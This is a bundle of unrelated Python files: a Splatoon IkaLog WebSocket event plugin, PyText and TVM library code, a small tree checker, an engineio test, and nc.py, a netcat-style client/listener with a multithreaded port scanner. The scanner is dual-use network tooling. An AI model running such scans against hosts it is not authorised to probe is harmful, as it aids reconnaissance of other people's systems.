self._send_message({'event': 'on_game_splatzone_we_got'})
def on_game_splatzone_we_lost(self, context):
self._send_message({'event': 'on_game_splatzone_we_lost'})
def on_game_splatzone_they_got(self, context):
self._send_message({'event': 'on_game_splatzone_they_got'})
def on_game_splatzone_they_lost(self, context):
self._send_message({'event': 'on_game_splatzone_they_lost'})
# Ranked, Rainmaker battles
def on_game_rainmaker_we_got(self, context):
self._send_message({'event': 'on_game_rainmaker_we_got'})
def on_game_rainmaker_we_lost(self, context):
self._send_message({'event': 'on_game_rainmaker_we_lost'})
def on_game_rainmaker_they_got(self, context):
self._send_message({'event': 'on_game_rainmaker_they_got'})
def on_game_rainmaker_they_lost(self, context):
self._send_message({'event': 'on_game_rainmaker_they_lost'})
# Ranked, Tower control battles
def on_game_tower_we_got(self, context):
self._send_message({'event': 'on_game_tower_we_got'})
def on_game_tower_we_lost(self, context):
self._send_message({'event': 'on_game_tower_we_lost'})
def on_game_tower_they_got(self, context):
self._send_message({'event': 'on_game_tower_they_got'})
def on_game_tower_they_lost(self, context):
self._send_message({'event': 'on_game_tower_they_lost'})
# Counter / ObjectTracking.
def on_game_paint_score_update(self, context):
self._send_message({
'event': 'on_game_paint_score_update',
'paint_score': context['game'].get('paint_score', 0)
})
# Result scenes.
def on_result_judge(self, context):
self._send_message({
'event': 'on_result_judge',
'judge': context['game'].get('judge', None),
'knockout': context['game'].get('knockout', None),
})
def on_result_udemae(self, context):
        # FIXME: add more data fields
self._send_message({
'event': 'on_result_udemae',
})
def on_result_gears(self, context):
        # FIXME: add more data fields
self._send_message({
'event': 'on_result_gears',
})
def on_result_festa(self, context):
        # FIXME: we want to know the player's own Splatfest title here
game = context['game']
self._send_message({
'event': 'on_result_festa',
'festa_exp_pre': game.get('reslut_festa_exp_pre', None),
'festa_exp': game.get('reslut_festa_exp', None),
})
def on_game_individual_result(self, context):
me = IkaUtils.getMyEntryFromContext(context)
print(me)
self._send_message({
'event': 'on_result_detail',
'won': context['game'].get('won', None),
'rank': me.get('rank', None),
'score': me.get('score', None),
'udemae': me.get('udemae_pre', None),
'kills': me.get('kills', None),
'deaths': me.get('deaths', None),
'weapon': me.get('weapon', None),
})
def on_result_udemae(self, context):
d = context['scenes']['result_udemae']
self._send_message({
'event': 'on_result_udemae',
'udemae_str': d.get('udemae_str_after', None),
'udemae_exp': d.get('udemae_exp_after', None),
})
def on_result_gears(self, context):
self._send_message({
'event': 'on_result_gears',
})
def on_game_session_end(self, context):
self._send_message({
'event': 'on_game_session_end',
})
def worker_func(self, websocket_server):
print(websocket_server)
self.application = tornado.web.Application([
(r'/', IndexHandler),
(r'/ws', WebSocketHandler),
])
# FIXME: bind_addr
self.application.listen(websocket_server._port)
IkaUtils.dprint('%s: Listen port %d' % (self, websocket_server._port))
IkaUtils.dprint('%s: Started server thread' % self)
tornado.ioloop.IOLoop.instance().start()
IkaUtils.dprint('%s: Stopped server thread' % self)
def shutdown_server(self):
tornado.ioloop.IOLoop.instance().stop()
def initialize_server(self):
if self.worker_thread is not None:
if self.worker_thread.is_alive():
IkaUtils.dprint(
'%s: Waiting for shutdown of server thread' % self)
self.shutdown_server()
# XXX
while self.worker_thread.is_alive():
time.sleep(2)
IkaUtils.dprint('%s: server is shut down.' % self)
if not self._enabled:
return
self.worker_thread = threading.Thread(
target=self.worker_func, args=(self,))
self.worker_thread.daemon = True
self.worker_thread.start()
# IkaUI Handlers
def apply_ui(self):
self._enabled = self.check_enable.GetValue()
self._port = int(self.edit_port.GetValue())
self.initialize_server()
def refresh_ui(self):
self.check_enable.SetValue(self._enabled)
        if self._port is not None:
self.edit_port.SetValue(str(self._port))
else:
self.edit_port.SetValue('9090')
self._internal_update = False
def on_config_reset(self, context=None):
self._enabled = False
self._host = '127.0.0.1'
        self._port = 9090
def on_config_load_from_context(self, context):
self.on_config_reset(context)
try:
conf = context['config']['websocket_server']
except:
conf = {}
if 'Enable' in conf:
self._enabled = conf['Enable']
if 'port' in conf:
try:
self._port = int(conf['port'])
except ValueError:
IkaUtils.dprint('%s: port must be an integer' % self)
self._port = 9090
self.refresh_ui()
self.initialize_server()
return True
def on_config_save_to_context(self, context):
context['config']['websocket_server'] = {
'Enable': self._enabled,
'port': self._port,
}
def on_config_apply(self, context):
self.apply_ui()
def on_option_tab_create(self, notebook):
self.panel = wx.Panel(notebook, wx.ID_ANY)
self.page = notebook.InsertPage(0, self.panel, _('WebSocket Server'))
self.layout = wx.BoxSizer(wx.VERTICAL)
self.check_enable = wx.CheckBox(
self.panel, wx.ID_ANY, _('Enable WebSocket Server'))
self.edit_port = wx.TextCtrl(self.panel, wx.ID_ANY, 'port')
layout = wx.GridSizer(2)
layout.Add(wx.StaticText(self.panel, wx.ID_ANY, _('Listen port')))
layout.Add(self.edit_port)
self.layout.Add(self.check_enable)
self.layout.Add(wx.StaticText(
self.panel, wx.ID_ANY,
_('WARNING: The server is accessible by anyone.'),
))
self.layout.Add(layout, flag=wx.EXPAND)
self.panel.SetSizer(self.layout)
def __init__(self, enabled=False, bind_addr='127.0.0.1', port=9090):
if not _tornado_imported:
print("モジュール tornado がロードできませんでした。 WebSocket サーバが起動できません。")
print("インストールするには以下のコマンドを利用してください。\n pip install tornado\n")
return
self._enabled = enabled
        self._port = port
self.worker_thread = None
self.initialize_server()
if __name__ == "__main__":
    obj = WebSocketServer(enabled=True)
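    # Illustrative only: this is the compact JSON frame every connected client
    # would receive for a simple event; the format mirrors _send_message() above.
    print(json.dumps({'event': 'on_game_killed'}, separators=(',', ':'), ensure_ascii=False))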
|
hogwild_trainer.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Any, Tuple
import torch
import torch.multiprocessing as mp
from pytext.common.constants import Stage
from pytext.config import PyTextConfig
from pytext.config.pytext_config import ConfigBase
from pytext.metric_reporters import MetricReporter
from pytext.models.model import Model
from pytext.trainers.trainer import Trainer
from pytext.utils import cuda
from torchtext.data import Iterator
class HogwildTrainer(Trainer):
class Config(ConfigBase):
real_trainer: Trainer.Config = Trainer.Config()
num_workers: int = 1
@classmethod
def from_config(cls, config: Config, model: torch.nn.Module, *args, **kwargs):
# can't run hogwild on cuda
if cuda.CUDA_ENABLED or config.num_workers == 1:
return Trainer(config.real_trainer, model)
return cls(config.real_trainer, config.num_workers, model, *args, **kwargs)
def __init__(
self, real_trainer_config, num_workers, model: torch.nn.Module, *args, **kwargs
):
super().__init__(real_trainer_config, model, *args, **kwargs)
self.num_workers = num_workers
def _run_epoch(
self,
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch=lambda: None,
backprop=lambda loss, timer=None: None,
rank=0,
num_samples_to_log_progress=1000,
):
if stage == Stage.TRAIN:
processes = []
for worker_rank in range(self.num_workers):
# Initialize the batches with different random states.
data_iter.batches.init_epoch()
p = mp.Process(
target=super()._run_epoch,
args=(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
worker_rank,
num_samples_to_log_progress,
),
)
processes.append(p)
p.start()
for p in processes:
p.join()
else:
return super()._run_epoch(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
rank,
num_samples_to_log_progress,
)
def train(
self,
train_iter: Iterator,
eval_iter: Iterator,
model: Model,
metric_reporter: MetricReporter,
pytext_config: PyTextConfig,
*args,
**kwargs
) -> Tuple[torch.nn.Module, Any]:
print("Num of workers for Hogwild Training is {}".format(self.num_workers))
# Share memory of tensors for concurrent updates from multiple processes.
if self.num_workers > 1:
for param in model.parameters():
param.share_memory_()
return super().train(
train_iter, eval_iter, model, metric_reporter, pytext_config
)
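# --- Minimal, self-contained Hogwild sketch (illustrative; plain torch on CPU) ---
# It mirrors the pattern HogwildTrainer relies on above: share the parameter
# storage with share_memory_() and let several torch.multiprocessing workers
# update it in place without locks. Worker count and values are arbitrary.
def _hogwild_demo_worker(weight):
    # Every process sees the same underlying storage and updates it in place.
    with torch.no_grad():
        weight += 1.0
if __name__ == "__main__":
    w = torch.zeros(3)
    w.share_memory_()  # required so child processes share the same storage
    workers = [mp.Process(target=_hogwild_demo_worker, args=(w,)) for _ in range(4)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
    print(w)  # typically tensor([4., 4., 4.]); updates are lock-free, so races are possible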
|
6-3.py
|
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
def IsBinarySearchTree(j, mn, mx):
    if j not in tree: return True
if tree[j][0] < mn or tree[j][0] > mx: return False
return IsBinarySearchTree(tree[j][1], mn, tree[j][0] - 1) and IsBinarySearchTree(tree[j][2], tree[j][0], mx)
def main():
nodes = int(sys.stdin.readline().strip())
global tree
tree, int_max, int_min = {}, 2147483647, -2147483648
for i in range(nodes):
        tree[i] = list(map(int, sys.stdin.readline().strip().split()))
if IsBinarySearchTree(0, int_min, int_max):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
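# Illustrative input (format assumed from the reading loop in main above; -1
# is taken to mean "no child"):
#   3          <- number of nodes
#   2 1 2      <- node 0: key 2, left child = node 1, right child = node 2
#   1 -1 -1    <- node 1: key 1, leaf
#   3 -1 -1    <- node 2: key 3, leaf
# Node 0 is the root; every left key < parent key <= right key, so the
# expected output here is CORRECT.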
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import traceback
import warnings
import tvm
from tvm import autotvm, transform
from tvm._ffi.base import TVMError
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.target import Target
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target, opt_level=3):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=opt_level,
config={
"relay.backend.use_auto_scheduler": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
try:
compiler.lower(mod, target)
except TVMError:
logger.warning("Got exception in task extraction:\n %s", traceback.format_exc())
finally:
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod,
params,
target,
target_host=None,
hardware_params=None,
include_simple_tasks=False,
dump_workload_to_dag_log=None,
opt_level=3,
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
dump_workload_to_dag_log: Optional[str]
A file to dump an association between the workload keys and the actual DAG
opt_level : Optional[int]
The optimization level of the task extractions.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
if target_host is not None:
warnings.warn(
"target_host parameter is going to be deprecated. "
"Please pass in tvm.target.Target(target, host=target_host) instead."
)
target, target_host = Target.check_and_update_host_consist(target, target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
dispatch_ctx = DispatchContext.current
old_verbose = dispatch_ctx.verbose
dispatch_ctx.verbose = 0
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(
target=call_all_topi_funcs, args=(mod, params, target, opt_level)
)
build_thread.start()
build_thread.join()
dispatch_ctx.verbose = old_verbose
# create search tasks
tasks = []
weights = []
for wkl_key, (weight, func_names) in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
task_inputs=(
env.wkl_key_to_input_names[wkl_key]
if wkl_key in env.wkl_key_to_input_names
else None
),
task_inputs_save_to_file=True,
desc=",".join(func_names),
)
)
weights.append(int(weight))
if dump_workload_to_dag_log is not None:
with open(dump_workload_to_dag_log, "w") as f:
json.dump({task.workload_key: str(task.compute_dag) for task in tasks}, f)
return tasks, weights
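# A usage sketch (illustrative only, not part of this module): assuming a Relay
# module `mod` with its `params` was obtained elsewhere (e.g. from a frontend
# importer), task extraction could look like this:
#
#   tasks, task_weights = extract_tasks(mod["main"], params, target="llvm")
#   for idx, task in enumerate(tasks):
#       print("Task %d (weight %d): %s" % (idx, task_weights[idx], task.workload_key))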
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
# same as EXTRACT_TASK but ignore the task without complex ops
EXTRACT_COMPLEX_TASK_ONLY = 1
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.func_name_to_wkl_key = {}
self.wkl_key_to_weight = {}
self.wkl_key_to_input_names = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, func_name, workload_key):
"""Add the workload key of a search task.
Parameters
----------
func_name: str
The function name of the task.
workload_key: str
The workload key of a task.
"""
self.func_name_to_wkl_key[func_name] = workload_key
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = (0, set())
weight, func_names = self.wkl_key_to_weight[workload_key]
func_names.add(func_name)
self.wkl_key_to_weight[workload_key] = (weight + 1, func_names)
def add_workload_input_names(self, workload_key, input_names):
"""Add special task inputs to this workload.
Parameters
----------
workload_key : str
The workload key of a task.
input_names : List[str]
A list of input names.
"""
self.wkl_key_to_input_names[workload_key] = input_names
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(func_name, outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
func_name: str
The name of the function being scheduled.
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
from tvm.auto_scheduler.measure import (
prepare_input_map,
) # lazily import to avoid recursive dependency
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.workload_key(), io_tensors)
target = tvm.target.Target.current()
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag, func_name)
schedule = None
env = TracingEnvironment.current
if env is None:
# in the final build mode
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(func_name, key)
input_map = prepare_input_map(io_tensors)
if input_map:
env.add_workload_input_names(key, list(input_map.values()))
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
if state is None:
return None
# rewrite the layout and update the context for the new dag
new_dag = dag.rewrite_layout_from_state(state)
new_key = new_dag.workload_key()
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
@tvm._ffi.register_func("auto_scheduler.relay_integration.te_compiler_update_weights")
def te_compiler_update_weights(function_weights):
"""A callback for updating the weights of extracted tasks. When using the TE compiler
that avoids compiling the same function multiple times by caching, all extracted tasks
have weight 1, so the TE compiler invokes this callback at the end. In this case,
we override existing weights with the use_count in TE compiler cache.
Parameters
----------
function_weights: Dict[str, int]
Mapping from function names to their weights.
"""
env = TracingEnvironment.current
if env is not None:
# Override this map with the weights in the TE compiler.
env.wkl_key_to_weight = {}
for func_name, weight in function_weights.items():
# If the function name is not in the map, then it means we are not interested in
# this function during task extraction (e.g., a function without reduction).
if func_name not in env.func_name_to_wkl_key:
continue
workload_key = env.func_name_to_wkl_key[func_name]
if workload_key not in env.wkl_key_to_weight:
env.wkl_key_to_weight[workload_key] = (0, set())
            # Note that a function that appears multiple times in a model will be renamed
            # to make sure function names are unique, so we use the workload key generated
            # from the function's TE compute to determine its weight.
old_weight, func_names = env.wkl_key_to_weight[workload_key]
func_names.add(func_name)
env.wkl_key_to_weight[workload_key] = (old_weight + weight, func_names)
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
    Returns
    -------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
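# For reference, the flag queried above is the same one set during compilation.
# A sketch mirroring the PassContext configuration used in call_all_topi_funcs
# earlier in this file (`mod`, `params` and `target` are assumed to come from
# elsewhere):
#
#   with tvm.transform.PassContext(
#       opt_level=3,
#       config={"relay.backend.use_auto_scheduler": True},
#   ):
#       lib = relay.build(mod, target=target, params=params)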
|
nc.py
|
from socket import AF_INET6, AF_INET, SOCK_STREAM, SOCK_DGRAM, socket
from argparse import ArgumentParser
from logging import basicConfig, info, INFO, CRITICAL
from threading import Thread
## Options to implement
## Tunnel
# -P tunneling port
# -S tunneling address
# Receive function (receives a buffer of any size)
def recv(client):
buffer = b''
while True:
data = client.recv(1024)
if len(data) < 1024:
return buffer + data
buffer += data
# Check whether the other side sends data first
def checkTheyFirstSend(client, timeout):
client.settimeout(5)
try:
data = recv(client)
client.settimeout(timeout)
return data
except:
client.settimeout(timeout)
return False
# Handler for the connection tunnel
class TunnelHandler:
pass
# Handler for the scanner
class ScannerHandler:
def __init__(self):
        # Family of all the sockets that are going to be created
self.__family = None
# protocol of all the sockets that are going to be created
self.__protocol = None
# Host
self.__address = None
# Ports as iter
self.__ports = None
# Results of the scan
self.__active_ports = []
# Useful for multi threading scan
self.__active_connections = 0
# Get reference information for the creation of each socket thread
def setSocket(self, s: socket):
# Get the socket family
self.__family = s.family
# Get the socket protocol
self.__protocol = s.type
# Close the socket because we only need from it the family and protocol
s.close()
def setAddress(self, address: str):
self.__address = address
def setPort(self, *ports):
self.__ports = ports
# Start the scanner
def start(self):
for port in self.__ports:
while self.__active_connections >= 100:
pass
Thread(target=self.connectionHandler, args=[socket(self.__family, self.__protocol), port]).start()
while self.__active_connections > 0:
pass
def connectionHandler(self, s, target_port):
self.__active_connections += 1
try:
s.connect((self.__address, target_port))
self.__active_ports.append(target_port)
info(f'OPEN PORT {target_port}')
except:
pass
s.close()
del s
self.__active_connections -= 1
# Wraps the parsed options so they are easy to handle
class ConfigurationHandler:
def __init__(self):
self.__host = ''
self.__ports = None
# Family of the socket
self.__family = None
# Protocol of the socket
self.__protocol = None
# Time out of the socket
self.__timeout = None
self.__mode = 'Client' # Client by default
## Modular options
# Set port with -p option
def setports(self, ports):
if len(ports):
self.setPorts(ports)
# Set address (host) with -s option
def sethost(self, host):
        if len(host):  # only override when a value was given (don't clobber the positional host)
self.setHost(host)
# Set host
def setHost(self, host: str):
if len(host):
self.__host = host
# Set the family of the socket
def setFamily(self, family):
self.__family = family
# Set protocol of the socket: SOCK_STREAM, SOCK_DGRAM
def setProtocol(self, protocol):
self.__protocol = protocol
# Set Timeout of the socket
def setTimeout(self, timeout: float):
self.__timeout = timeout
    # Set the verbose mode: print everything or only errors
def setVerbose(self, value: bool):
if value:
basicConfig(level=INFO, format='%(message)s')
else:
basicConfig(level=CRITICAL, format='%(message)s')
# Set the mode to listen
def setModeListen(self, value: bool):
if value:
self.__mode = 'Listen'
# Set mode to scan
def setModeScan(self, value: bool):
if value:
self.__mode = 'Scan'
# Port setup
def setPorts(self, ports):
if len(ports):
ports = ports.split(',')
buffer = []
for port in ports:
if '-' in port:
splited_port = port.split('-')
buffer += list(range(int(splited_port[0]), int(splited_port[1]) + 1))
else:
if port.isnumeric():
buffer.append(int(port))
self.__ports = buffer
## Function that return processed data
# Create the socket and return it
def getSocket(self):
s = socket(self.__family, self.__protocol)
s.settimeout(self.__timeout)
return s
# return the mode of the session
def getMode(self):
return self.__mode
# Return the address (host)
def getHost(self):
return self.__host
# Return the port or the ports to be used by the handler
def getPorts(self):
return self.__ports
# Handler for socket as client and the tunnel
class ClientHandler:
def __init__(self):
# Socket for the server
self.__socket = None
self.__address = None
self.__port = None
def setSocket(self, s: socket):
self.__socket = s
def setAddress(self, address: str):
self.__address = address
def setPort(self, port):
self.__port = port
def start(self):
self.__socket.connect((self.__address, self.__port))
self.connectionHandler()
def connectionHandler(self):
while True:
            # Check whether the remote side sends first
welcome = checkTheyFirstSend(self.__socket, self.__socket.gettimeout())
if welcome:
info(welcome.decode('utf-8'))
while True:
input_buffer = input().encode('utf-8')
self.__socket.sendall(input_buffer)
response = recv(self.__socket)
try:
info(response.decode('utf-8'))
except:
                    # Rough check to avoid dumping large (e.g. file) content to the terminal
if len(response) < 10000:
info(str(response))
# Handler for the listener
class ServerHandler:
def __init__(self):
# Socket for the server
self.__socket = None
self.__address = None
self.__port = None
def setSocket(self, s: socket):
self.__socket = s
# Set address (host) for the socket
def setAddress(self, address: str):
self.__address = address
# Set the port of the connection
def setPort(self, port):
self.__port = port
# Enable server mode
def start(self):
self.__socket.bind((self.__address, self.__port))
self.__socket.listen(1)
try:
self.connectionHandler()
except Exception as e:
info(str(e))
# Handler for the server session
def connectionHandler(self):
client, address = self.__socket.accept()
welcome = checkTheyFirstSend(client, self.__socket.gettimeout())
if welcome:
info(welcome.decode('utf-8'))
while True:
input_buffer = input().encode('utf-8')
client.sendall(input_buffer)
response = recv(client)
# Try to decode and print the response
try:
info(response.decode('utf-8'))
except:
                # Rough check to avoid dumping large (e.g. file) content to the terminal
if len(response) < 10000:
info(str(response))
def main(args=None):
# Modes and its classes
modes = {'Listen': ServerHandler, 'Client': ClientHandler, 'Scan': ScannerHandler}
if not args:
parser = ArgumentParser()
parser.add_argument('setHost', help='Set target host', nargs='?', default='') # Implemented
# Port or ports for the connection or scanner
parser.add_argument('setPorts',
                        help='Port[s] to be used (in scan mode you can set ranges like 10-50; multiple values are comma "," separated)',
nargs='?', default='')
# Set address family
parser.add_argument('-6', help='Set address family to IPV6', dest='setFamily', action='store_const',
const=AF_INET6, default=AF_INET) # Implemented
# Set address protocol
parser.add_argument('-u', help='Set address protocol to UDP', dest='setProtocol', action='store_const',
const=SOCK_DGRAM, default=SOCK_STREAM) # Implemented
# Server mode
parser.add_argument('-l', '--listen', help='Listen for incoming connections', dest='setModeListen',
action='store_const', const=True, default=False) # Implemented
# Verbose mode
parser.add_argument('-v', '--verbose', help='Verbose mode', dest='setVerbose', action='store_const', const=True,
default=False) # Implemented
# Timeout limit for connections
parser.add_argument('-w', '--wait', help='Connection timeout', dest='setTimeout', default=3600,
type=float) # Implemented
# Set port[s] with an option
parser.add_argument('-p', '--port', dest='setports', help='Set the port or ports to be processed',
default='') # Implemented
# Set address (host) with an option
parser.add_argument('-s', '--address', dest='sethost', help='Set host to be processed with an option',
default='')
# Enable scanner mode
parser.add_argument('-z', '--scan', dest='setModeScan', help='Set mode to scan', action='store_const',
const=True, default=False)
args = vars(parser.parse_args())
c = ConfigurationHandler()
for key in args:
getattr(c, key)(args[key])
s = c.getSocket()
mode = c.getMode()
host = c.getHost()
    # Select the handler corresponding to the user options
handler = modes[mode]()
# Set the host target to the handler
handler.setAddress(host)
# Set the socket to be used by the handler
handler.setSocket(s)
handler.setPort(*c.getPorts())
handler.start()
if __name__ == '__main__':
    try:
        main()
    except Exception as e:
        print(e)
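# Example invocations (a sketch based on the options defined above; the script
# file name is assumed to be nc.py):
#
#   python nc.py -l -v -p 4444                   # listen on port 4444, verbose
#   python nc.py example.com 80 -v               # connect to example.com:80
#   python nc.py -z -v example.com -p 20-25,80   # scan ports 20-25 and port 80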
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.1
mock_server.ping_interval = 0.1
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = mock.Mock()
mock_server.async.Queue = queue.Queue
mock_server.async.QueueEmpty = queue.Empty
mock_server.async.thread = lambda t: threading.Thread(target=t)
mock_server.async.has_websocket = False
return mock_server
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
